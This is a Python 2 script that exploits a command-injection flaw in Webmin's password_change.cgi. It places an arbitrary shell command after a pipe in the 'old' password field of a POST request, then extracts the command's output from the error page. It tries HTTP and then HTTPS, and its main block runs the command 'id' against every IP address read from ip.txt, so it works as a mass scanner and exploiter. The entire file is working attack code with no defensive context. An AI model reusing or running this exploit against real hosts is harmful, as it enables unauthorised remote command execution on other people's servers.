import requests
import warnings
warnings.filterwarnings("ignore")

def test_post_https(ip,command):
    try:
        url = 'https://' + ip + ':10000/password_change.cgi'
        headers = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Referer': 'https://' + ip + ':10000/session_login.cgi',
            'Cookie': 'redirect=1; testing=1; sid=x',
            'Connection': 'close',
            'Upgrade-Insecure-Requests': '1',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Content-Length': '47'
        } 

        payload = 'user=a&pam=&expired=2&old=test|' + command + '&new1=test1&new2=test1'
        r = requests.post(url, data=payload, headers = headers, verify = False)
    
        if r.status_code ==200 and 'Failed to change password : The current password is incorrect' in r.text : 
            print '[+]Vulnerable:%s'%ip
    	
            nPos1 = r.text.index('Failed to change password : The current password is incorrect')
            nPos2 = r.text.index('</h3></center>')
            print 'Result:'
            print r.text[nPos1+61:nPos2]

        else:
            print '[!]NotVulnerable:%s'%ip
            print r.text
    except Exception as e:
            print '[!]Error:%s'%e


def test_post_http(ip,command):
    try:
        url = 'http://' + ip + ':10000/password_change.cgi'
        headers = {
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.5',
            'Accept-Encoding': 'gzip, deflate',
            'Referer': 'http://' + ip + ':10000/session_login.cgi',
            'Cookie': 'redirect=1; testing=1; sid=x',
            'Connection': 'close',
            'Upgrade-Insecure-Requests': '1',
            'Content-Type': 'application/x-www-form-urlencoded',
            'Content-Length': '47'
        } 

        payload = 'user=a&pam=&expired=2&old=test|' + command + '&new1=test1&new2=test1'
        r = requests.post(url, data=payload, headers = headers)
    
        if r.status_code ==200 and 'Failed to change password : The current password is incorrect' in r.text : 
            print '[+]Vulnerable:%s'%ip
    	
            nPos1 = r.text.index('Failed to change password : The current password is incorrect')
            nPos2 = r.text.index('</h3></center>')
            print 'Result:'
            print r.text[nPos1+61:nPos2]

	elif r.status_code ==200 and 'This web server is running in SSL mode.' in r.text : 
            print '[*]This web server is running in SSL mode.Try to use https'
            test_post_https(ip,command)	

        else:
            print '[!]NotVulnerable:%s'%ip
            print r.text
    except Exception as e:
            print '[!]Error:%s'%e
        
if __name__ == '__main__':
    file_object = open('ip.txt', 'r')
    for line in file_object:
        test_post_http(line.strip('\r\n'),'id')


    
